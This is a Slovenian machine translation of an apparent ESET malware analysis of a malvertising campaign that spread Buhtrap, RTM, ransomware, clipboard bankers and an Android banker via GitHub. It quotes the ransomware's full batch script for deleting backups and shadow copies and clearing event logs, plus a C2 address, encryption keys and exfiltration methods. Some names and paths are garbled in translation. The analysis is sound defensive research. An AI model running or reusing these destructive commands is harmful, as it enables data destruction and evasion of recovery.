Če želite ciljati na računovodje v kibernetskem napadu, lahko uporabite delovne dokumente, ki jih iščejo na spletu. To je približno tisto, kar je v zadnjih nekaj mesecih počela kibernetska skupina, ki je distribuirala znana stranska vrata. и , kot tudi šifrirnike in programsko opremo za krajo kriptovalut. Večina tarč se nahaja v Rusiji. Napad je bil izveden z zlonamernim oglaševanjem na Yandex.Direct. Potencialne žrtve so bile usmerjene na spletno stran, kjer so bile pozvane, naj prenesejo zlonamerno datoteko, prikrito kot predlogo dokumenta. Yandex je zlonamerno oglaševanje po našem opozorilu odstranil.
Buhtrapova izvorna koda je v preteklosti pricurljala na splet, tako da jo lahko uporablja vsak. Nimamo informacij o razpoložljivosti kode RTM.
V tej objavi vam bomo povedali, kako so napadalci distribuirali zlonamerno programsko opremo z Yandex.Direct in jo gostili na GitHubu. Objavo bomo zaključili s tehnično analizo zlonamerne programske opreme.
Buhtrap in RTM ponovno delujeta
Mehanizem širjenja in žrtve
Različni tovori, dostavljeni žrtvam, imajo skupen mehanizem širjenja. Vse zlonamerne datoteke, ki so jih ustvarili napadalci, so bile shranjene v dveh različnih repozitorijah GitHub.
Običajno je repozitorij vseboval eno zlonamerno datoteko, ki jo je bilo mogoče prenesti in se je pogosto spreminjala. Ker vam GitHub omogoča ogled zgodovine sprememb v skladišču, lahko vidimo, katera zlonamerna programska oprema je bila distribuirana v določenem obdobju. Da bi žrtev prepričali v prenos zlonamerne datoteke, je bilo uporabljeno spletno mesto blanki-shabloni24[.]ru, prikazano na zgornji sliki.
Zasnova strani in vsa imena zlonamernih datotek sledijo enotnemu konceptu – obrazci, predloge, pogodbe, vzorci itd. Glede na to, da sta bili programi Buhtrap in RTM v preteklosti že uporabljeni pri napadih na računovodje, smo predvidevali, da strategija v novi kampanji je enaka. Edino vprašanje je, kako je žrtev prišla do mesta napadalcev.
Okužba
Vsaj več potencialnih žrtev, ki so končale na tem mestu, je pritegnilo zlonamerno oglaševanje. Spodaj je primer URL-ja:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Kot je razvidno iz povezave, je bila pasica objavljena na legitimnem računovodskem forumu bb.f2[.]kz. Pomembno je omeniti, da so se pasice pojavile na različnih straneh, vse so imele enak ID kampanje (blanki_rsya), večina pa se je nanašala na računovodske storitve ali storitve pravne pomoči. URL prikazuje, da je morebitna žrtev uporabila zahtevo »prenos obrazca za račun«, kar podpira našo hipotezo o ciljanih napadih. Spodaj so spletna mesta, kjer so se pojavile pasice, in ustrezne iskalne poizvedbe.
- prenesite obrazec za račun – bb.f2[.]kz
- vzorec pogodbe - Ipopen[.]ru
- vzorec pritožbe vloge - 77metrov[.]ru
- obrazec pogodbe - blank-dogovor-kupli-prodazhi[.]ru
- vzorec sodne peticije - zen.yandex[.]ru
- vzorec pritožbe - yurday[.]ru
- vzorci pogodbenih obrazcev – Regforum[.]ru
- oblika pogodbe – assistentus[.]ru
- vzorec pogodbe o stanovanju – napravah[.]com
- vzorci pravnih pogodb - avito[.]ru
Spletno mesto blanki-shabloni24[.]ru je morda konfigurirano tako, da opravi preprosto vizualno oceno. Običajno se oglas, ki kaže na spletno mesto profesionalnega videza s povezavo do GitHub, ne zdi nekaj očitno slabega. Poleg tega so napadalci naložili zlonamerne datoteke v repozitorij le za omejeno obdobje, verjetno med kampanjo. Večino časa je repozitorij GitHub vseboval prazen arhiv zip ali prazno datoteko EXE. Tako bi napadalci lahko distribuirali oglaševanje prek Yandex.Direct na spletnih mestih, ki so jih najverjetneje obiskali računovodje, ki so prišli kot odgovor na določene iskalne poizvedbe.
Nato si poglejmo različne tovore, porazdeljene na ta način.
Analiza koristne obremenitve
Kronologija distribucije
Zlonamerna kampanja se je začela konec oktobra 2018 in je aktivna v času pisanja. Ker je bilo celotno skladišče javno dostopno na GitHubu, smo sestavili natančno časovnico distribucije šestih različnih družin zlonamerne programske opreme (glejte sliko spodaj). Za primerjavo z zgodovino git smo dodali vrstico, ki prikazuje, kdaj je bila odkrita povezava na pasico, kot jo je izmerila telemetrija ESET. Kot lahko vidite, se to dobro ujema z razpoložljivostjo tovora na GitHubu. Neskladje ob koncu februarja je mogoče razložiti z dejstvom, da nismo imeli dela zgodovine sprememb, ker je bil repozitorij odstranjen iz GitHuba, preden smo ga lahko dobili v celoti.
Slika 1. Kronologija distribucije zlonamerne programske opreme.
Certifikati za podpis kode
Kampanja je uporabila več certifikatov. Nekatere je podpisalo več kot ena družina zlonamerne programske opreme, kar dodatno nakazuje, da so različni vzorci pripadali isti akciji. Kljub razpoložljivosti zasebnega ključa operaterji niso sistematično podpisovali binarnih datotek in ključa niso uporabili za vse vzorce. Konec februarja 2019 so napadalci začeli ustvarjati neveljavne podpise z Googlovim potrdilom, za katerega niso imeli zasebnega ključa.
Vsa potrdila, vključena v kampanjo, in družine zlonamerne programske opreme, ki jih podpisujejo, so navedene v spodnji tabeli.
Ta potrdila za podpisovanje kod smo uporabili tudi za vzpostavitev povezav z drugimi družinami zlonamerne programske opreme. Za večino potrdil nismo našli vzorcev, ki niso bili distribuirani prek repozitorija GitHub. Vendar je bilo potrdilo TOV »MARIYA« uporabljeno za podpis zlonamerne programske opreme, ki pripada botnetu , oglaševalska programska oprema in rudarji. Malo verjetno je, da je ta zlonamerna programska oprema povezana s to akcijo. Najverjetneje je bil certifikat kupljen na darknetu.
Win32/Filecoder.Buhtrap
Prva komponenta, ki je pritegnila našo pozornost, je bila na novo odkrita Win32/Filecoder.Buhtrap. To je binarna datoteka Delphi, ki je včasih zapakirana. V glavnem je bil razdeljen februarja–marca 2019. Obnaša se, kot se za izsiljevalski program spodobi – išče lokalne diske in omrežne mape ter šifrira zaznane datoteke. Ne potrebuje internetne povezave, da bi bil ogrožen, ker ne vzpostavi stika s strežnikom za pošiljanje šifrirnih ključev. Namesto tega na konec sporočila o odkupnini doda »žeton« in predlaga uporabo e-pošte ali Bitmessage za stik z operaterji.
Da bi šifriral čim več občutljivih virov, Filecoder.Buhtrap zažene nit, namenjeno zaustavitvi ključne programske opreme, ki ima morda odprte upravljalnike datotek, ki vsebujejo dragocene informacije, ki bi lahko motile šifriranje. Ciljni procesi so predvsem sistemi za upravljanje baz podatkov (DBMS). Poleg tega Filecoder.Buhtrap izbriše dnevniške datoteke in varnostne kopije, da oteži obnovitev podatkov. Če želite to narediti, zaženite spodnji paketni skript.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap uporablja zakonito spletno storitev IP Logger, namenjeno zbiranju informacij o obiskovalcih spletnega mesta. To je namenjeno sledenju žrtvam izsiljevalske programske opreme, za kar je odgovorna ukazna vrstica:
mshta.exe "javascript:document.write('');"
Datoteke za šifriranje so izbrane, če se ne ujemajo s tremi seznami izključitev. Prvič, datoteke z naslednjimi končnicami niso šifrirane: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys in .netopir. Drugič, iz spodnjega seznama so izključene vse datoteke, katerih polna pot vsebuje nize imenikov.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Tretjič, določena imena datotek so prav tako izključena iz šifriranja, med njimi ime datoteke sporočila o odkupnini. Seznam je predstavljen spodaj. Očitno so vse te izjeme namenjene ohranjanju delovanja stroja, vendar z minimalno vozno sposobnostjo.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Shema šifriranja datotek
Ko se izvede, zlonamerna programska oprema ustvari 512-bitni par ključev RSA. Zasebni eksponent (d) in modul (n) sta nato šifrirana s trdo kodiranim 2048-bitnim javnim ključem (javni eksponent in modul), zapakirana v zlib in kodirana z base64. Koda, odgovorna za to, je prikazana na sliki 2.
Slika 2. Rezultat dekompilacije Hex-Rays procesa generiranja 512-bitnega para ključev RSA.
Spodaj je primer navadnega besedila z ustvarjenim zasebnim ključem, ki je žeton, priložen sporočilu o odkupnini.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Javni ključ napadalcev je podan spodaj.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Datoteke so šifrirane z uporabo AES-128-CBC z 256-bitnim ključem. Za vsako šifrirano datoteko se ustvarita nov ključ in nov inicializacijski vektor. Ključni podatki so dodani na konec šifrirane datoteke. Razmislimo o formatu šifrirane datoteke.
Šifrirane datoteke imajo naslednjo glavo:
Podatki izvorne datoteke z dodatkom magične vrednosti VEGA so šifrirani na prvih 0x5000 bajtov. Vse informacije o dešifriranju so priložene datoteki z naslednjo strukturo:
- Oznaka velikosti datoteke vsebuje oznako, ki označuje, ali je datoteka večja od 0x5000 bajtov
— Blob ključa AES = ZlibCompress(RSAEncrypt(ključ AES + IV, javni ključ ustvarjenega para ključev RSA))
- Blob ključa RSA = ZlibCompress(RSAEncrypt(generiran zasebni ključ RSA, trdo kodiran javni ključ RSA))
Win32/ClipBanker
Win32/ClipBanker je komponenta, ki je bila občasno distribuirana od konca oktobra do začetka decembra 2018. Njegova vloga je spremljanje vsebine odložišča, išče naslove denarnic za kriptovalute. Ko določi ciljni naslov denarnice, ga ClipBanker nadomesti z naslovom, ki naj bi pripadal operaterjem. Vzorci, ki smo jih pregledali, niso bili niti zapakirani niti zakriti. Edini mehanizem, ki se uporablja za prikrivanje vedenja, je šifriranje nizov. Naslovi denarnice operaterja so šifrirani z uporabo RC4. Ciljne kriptovalute so Bitcoin, Bitcoin cash, Dogecoin, Ethereum in Ripple.
V obdobju, ko se je zlonamerna programska oprema širila v Bitcoin denarnice napadalcev, je bila majhna količina poslana VTS, kar dvomi o uspehu kampanje. Poleg tega ni nobenih dokazov, ki bi kazali, da so bile te transakcije sploh povezane s ClipBankerjem.
Win32/RTM
Komponenta Win32/RTM je bila razdeljena nekaj dni v začetku marca 2019. RTM je trojanski bankir, napisan v Delphiju, namenjen oddaljenim bančnim sistemom. Leta 2017 so raziskovalci ESET objavili tega programa je opis še vedno ustrezen. Januarja 2019 je izdal tudi Palo Alto Networks .
Buhtrap nakladalnik
Nekaj časa je bil na GitHubu na voljo prenosnik, ki ni bil podoben prejšnjim orodjem Buhtrap. Obrne se k https://94.100.18[.]67/RSS.php?<some_id> da dobite naslednjo stopnjo in jo naložite neposredno v pomnilnik. Razlikujemo lahko dve vedenji kode druge stopnje. V prvem URL-ju je RSS.php posredoval stranska vrata Buhtrap neposredno - ta zadnja vrata so zelo podobna tistim, ki so bila na voljo po razkritju izvorne kode.
Zanimivo je, da vidimo več kampanj z zadnjimi vrati Buhtrap, ki naj bi jih vodili različni operaterji. V tem primeru je glavna razlika v tem, da se zadnja vrata naložijo neposredno v pomnilnik in ne uporabljajo običajne sheme s postopkom uvajanja DLL, o katerem smo govorili . Poleg tega so operaterji spremenili ključ RC4, ki se uporablja za šifriranje omrežnega prometa, na strežnik C&C. V večini kampanj, ki smo jih videli, se operaterji niso trudili spremeniti tega ključa.
Drugo, bolj zapleteno vedenje je bilo, da je bil URL RSS.php posredovan drugemu nalagalniku. Izvedel je nekaj zamegljenosti, kot je ponovna izdelava tabele dinamičnega uvoza. Namen zagonskega nalagalnika je vzpostaviti stik s strežnikom C&C [.]com/api/F27F84EDA4D13B15/2, pošljite dnevnike in počakajte na odgovor. Odziv obdela kot blob, ga naloži v pomnilnik in izvede. Koristni tovor, ki smo ga videli pri izvajanju tega nalagalnika, je bila ista stranska vrata Buhtrap, vendar so lahko tudi druge komponente.
Android/Spy.Banker
Zanimivo je, da se je v repozitoriju GitHub znašla tudi komponenta za Android. V glavni poslovalnici je bil le en dan - 1. Razen objave na GitHubu telemetrija ESET ne najde nobenih dokazov o distribuciji te zlonamerne programske opreme.
Komponenta je gostovala kot paket aplikacij za Android (APK). Močno je zamegljen. Zlonamerno vedenje je skrito v šifrirani datoteki JAR v APK-ju. Šifriran je z RC4 s tem ključem:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Isti ključ in algoritem se uporabljata za šifriranje nizov. JAR se nahaja v APK_ROOT + image/files. Prvi 4 bajti datoteke vsebujejo dolžino šifrirane datoteke JAR, ki se začne takoj za poljem dolžine.
Po dešifriranju datoteke smo odkrili, da je bil Anubis - prej bankir za Android. Zlonamerna programska oprema ima naslednje lastnosti:
- snemanje z mikrofonom
- snemanje posnetkov zaslona
- pridobivanje GPS koordinat
- zapisovalnik tipk
- šifriranje podatkov naprave in zahteva po odkupnini
- pošiljanje neželene pošte
Zanimivo je, da je bankir uporabil Twitter kot rezervni komunikacijski kanal za pridobitev drugega C&C strežnika. Vzorec, ki smo ga analizirali, je uporabljal račun @JonesTrader, ki pa je bil v času analize že blokiran.
Bankir vsebuje seznam ciljnih aplikacij na napravi Android. Je daljši od seznama, pridobljenega v študiji Sophos. Seznam vključuje številne bančne aplikacije, programe za spletno nakupovanje, kot sta Amazon in eBay, ter storitve za kriptovalute.
MSIL/ClipBanker.IH
Zadnja komponenta, distribuirana v okviru te kampanje, je bila izvršljiva datoteka .NET Windows, ki se je pojavila marca 2019. Večina preučevanih različic je bila pakirana s ConfuserEx v1.0.0. Tako kot ClipBanker tudi ta komponenta uporablja odložišče. Njegov cilj je širok nabor kriptovalut, pa tudi ponudba na Steamu. Poleg tega uporablja storitev IP Logger za krajo zasebnega ključa WIF Bitcoin.
Zaščitni mehanizmi
Poleg prednosti, ki jih ConfuserEx ponuja pri preprečevanju odpravljanja napak, odlaganja in poseganja, komponenta vključuje zmožnost zaznavanja protivirusnih izdelkov in virtualnih strojev.
Za preverjanje, ali deluje v virtualnem računalniku, zlonamerna programska oprema uporablja vgrajeno ukazno vrstico Windows WMI (WMIC), da zahteva informacije BIOS-a, in sicer:
wmic bios
Nato program razčleni izhod ukaza in poišče ključne besede: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Za odkrivanje protivirusnih izdelkov zlonamerna programska oprema pošlje zahtevo Windows Management Instrumentation (WMI) v varnostno središče Windows z uporabo ManagementObjectSearcher API, kot je prikazano spodaj. Po dekodiranju iz base64 je klic videti takole:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Slika 3. Postopek za prepoznavanje protivirusnih izdelkov.
Poleg tega zlonamerna programska oprema preveri, ali , orodje za zaščito pred napadi na odložišče in, če se izvaja, prekine vse niti v tem procesu in s tem onemogoči zaščito.
Vztrajnost
Različica zlonamerne programske opreme, ki smo jo preučevali, se kopira v to %APPDATA%googleupdater.exe in nastavi atribut "hidden" za imenik google. Nato spremeni vrednost SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell v registru Windows in doda pot updater.exe. Tako se bo zlonamerna programska oprema zagnala vsakič, ko se uporabnik prijavi.
Zlonamerno vedenje
Tako kot ClipBanker zlonamerna programska oprema spremlja vsebino odložišča in išče naslove denarnice za kriptovalute, in ko jih najde, jih nadomesti z enim od naslovov operaterja. Spodaj je seznam ciljnih naslovov glede na to, kar je najdeno v kodi.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Za vsako vrsto naslova obstaja ustrezen regularni izraz. Vrednost STEAM_URL se uporablja za napad na sistem Steam, kot je razvidno iz regularnega izraza, ki se uporablja za definiranje v medpomnilniku:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Eksfiltracijski kanal
Poleg zamenjave naslovov v medpomnilniku zlonamerna programska oprema cilja na zasebne ključe WIF denarnic Bitcoin, Bitcoin Core in Electrum. Program uporablja plogger.org kot izhodni kanal za pridobitev zasebnega ključa WIF. Da bi to naredili, operaterji dodajo podatke o zasebnem ključu v glavo HTTP User-Agent, kot je prikazano spodaj.
Slika 4. Konzola IP Logger z izhodnimi podatki.
Operaterji niso uporabili iplogger.org za izločanje iz denarnic. Verjetno so se zatekli k drugačni metodi zaradi omejitve 255 znakov v polju User-Agentprikazan v spletnem vmesniku IP Logger. V vzorcih, ki smo jih proučevali, je bil drugi izhodni strežnik shranjen v spremenljivki okolja DiscordWebHook. Presenetljivo je, da ta spremenljivka okolja ni dodeljena nikjer v kodi. To nakazuje, da je zlonamerna programska oprema še v razvoju in da je spremenljivka dodeljena operaterjevemu testnemu stroju.
Obstaja še en znak, da je program v razvoju. Binarna datoteka vključuje dva URL-ja iplogger.org in oba se poizvedujeta, ko pride do eksfiltracije podatkov. V zahtevi za enega od teh URL-jev je pred vrednostjo v polju Referer »DEV /«. Našli smo tudi različico, ki ni bila zapakirana z uporabo ConfuserEx, prejemnik tega URL-ja se imenuje DevFeedbackUrl. Glede na ime spremenljivke okolja verjamemo, da operaterji nameravajo uporabiti zakonito storitev Discord in njen sistem za spletno prestrezanje za krajo denarnic za kriptovalute.
Zaključek
Ta kampanja je primer uporabe zakonitih oglaševalskih storitev pri kibernetskih napadih. Shema cilja na ruske organizacije, vendar ne bi bili presenečeni, če bi videli tak napad z uporabo neruskih storitev. Da bi se izognili kompromisom, morajo biti uporabniki prepričani v ugled vira programske opreme, ki jo prenesejo.
Celoten seznam indikatorjev kompromisa in atributov MITER ATT&CK je na voljo na .
Vir: www.habr.com